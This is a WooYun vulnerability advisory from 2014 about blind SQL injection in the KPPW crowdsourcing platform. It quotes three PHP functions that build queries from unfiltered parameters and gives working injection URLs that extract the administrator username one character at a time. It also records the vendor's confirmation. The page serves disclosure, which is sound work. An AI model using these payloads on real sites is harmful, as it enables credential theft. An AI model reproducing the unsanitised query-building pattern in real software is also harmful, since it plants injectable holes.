当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-050078

漏洞标题:kppw威客系统存在多处SQL盲注漏洞

相关厂商:keke.com

漏洞作者: lancer

提交时间:2014-04-01 12:05

修复时间:2014-06-30 12:05

公开时间:2014-06-30 12:05

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-04-01: 细节已通知厂商并且等待厂商处理中
2014-04-01: 厂商已经确认,细节仅向厂商公开
2014-04-04: 细节向第三方安全合作伙伴开放
2014-05-26: 细节向核心白帽子及相关领域专家公开
2014-06-05: 细节向普通白帽子公开
2014-06-15: 细节向实习白帽子公开
2014-06-30: 细节向公众公开

简要描述:

参数过滤不严导致盲注,可以获取管理员用户名和密码

详细说明:

第一处漏洞代码:
/control/ajax/ajax_indus.php 11~31行

if (isset ( $code ) && $code == 'r5tv') {
	$tem_arr = array ($indus_pid );
	$indus_p_arr = kekezu::get_indus_by_index ( 1, $indus_pid );
	foreach ( $indus_p_arr [$indus_pid] as $k => $v ) {
		array_push ( $tem_arr, $v ['indus_id'] );
	}
	$indus_ids = implode ( ',', $tem_arr );
	unset ( $tem_arr );
	$skill_obj = new Keke_witkey_skill_class ();
	$skill_obj->setWhere ( "indus_id in ($indus_ids)" );
	$skill_arr = $skill_obj->query_keke_witkey_skill ();
	if (count ( $skill_arr ) == 0) {
		$option = array ($_lang['no_relation_skill']);
	} else {
		foreach ( $skill_arr as $row ) {
			$option [] = $row [skill_id] . '=>' . $row [skill_name];
		}
	}
	echo implode ( '|', $option );
	exit ();
}


变量$indus_pid过滤不严导致了注入。
第二处漏洞代码:
/lib/inc/keke_user_mark_class.php 221~253行

public static function get_user_aid($uid, $mark_type, $mark_status = null, $role_type = null, $model_code = null, $obj_id = null) {
		$aid_config = self::get_mark_aid ( $mark_type ); 
		$where = "  mark_type='$mark_type' ";
		$role_type == '1' and $where .= " and uid='$uid'";
		$role_type == '2' and $where .= " and by_uid='$uid'";
		if(is_null($mark_status)){
			$where .= " and mark_status > 0";
		}else{
			$where .= " and mark_status = $mark_status";
		}
		$model_code and $where .= " and model_code='$model_code' ";
		$obj_id and $where .= " and obj_id = '$obj_id' ";
		$aid_arr = db_factory::query ( " select aid,aid_star from " . TABLEPRE . "witkey_mark where $where " );
		$aid_info = array ();
		$si = sizeof ( $aid_arr );
		foreach ( $aid_config as $k => $v ) {
			if($aid_arr){
				for($i = 0; $i < $si; $i ++) {
					$aid_arr [$i] ['aid'] and $aid = explode ( ",", $aid_arr [$i] ['aid'] ) or $aid = array (); 
					$aid_arr [$i] ['aid_star'] and $star = explode ( ",", $aid_arr [$i] ['aid_star'] ) or $star = array (); 
					$aid&&$star and $aid_s = array_combine ( $aid, $star ); 
					$aid_info [$k] ['aid_name'] = $v ['aid_name']; 
					$aid_info [$k] ['star'] += floatval($aid_s [$k] ); 
					$aid_info [$k] ['count'] += 1; 
				}
			}else{
				$aid_info [$k] ['aid_name'] = $v ['aid_name']; 
				$aid_info [$k] ['star']     = 0; 
				$aid_info [$k] ['count']    = 0; 
			}
		}
		return self::consider_star ( $aid_info );
	}


$mark_status变量过滤不严,导致注入
第三处漏洞代码:
/control/ajax/ajax_menu.php 30~39行

case "load_square" :
		if ($ids) {
			$model_info = kekezu::get_table_data('*','witkey_model','model_status=1','','','','model_code');
            $cash_cove = $kekezu->get_cash_cove('',true);
			$op_desc = array('pub'=>'发布','leave'=>'留言','work'=>'投稿','focus'=>'收藏','buy'=>'购买');
			$square_arr = db_factory::query( sprintf ( " select * from %switkey_weibo where weibo_id in ($ids) order by on_time desc", TABLEPRE ) );
		} else {
			die ();
		}
		break;


$ids变量过滤不严,导致注入。

漏洞证明:

第一处漏洞利用过程:
1.直接访问
/index.php?do=ajax&view=indus&code=r5tv&indus_pid=0) || substr((select username from keke_witkey_member where uid=1),1,1)=0x61 limit 1%23
匹配成功时有数据显示
不成功时显示"没有相关技能"

1.jpg


2.jpg


第二出漏洞利用过程:
1.直接访问
/index.php?do=ajax&view=task&ajax=mark_aid&auid=-1&mark_type=1&mark_status=1 || substr((select username from keke_witkey_member where uid=1),1,1)=0x61
匹配成功

1.jpg


匹配不成功

2.jpg


第三处漏洞利用过程:
1.先在广场发布一条信息(防止weibo表中没有数据)

1.jpg


2.直接访问
/index.php?do=ajax&view=menu&ajax=load_square&ids=1) and substr((select username from keke_witkey_member where uid=1),1,1)=0x61%23
匹配成功

2.jpg


不成功

3.jpg

修复方案:

过滤

版权声明:转载请注明来源 lancer@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2014-04-01 14:28

厂商回复:

感谢关注,我们会尽力发布补丁包处理相关问题

最新状态:

暂无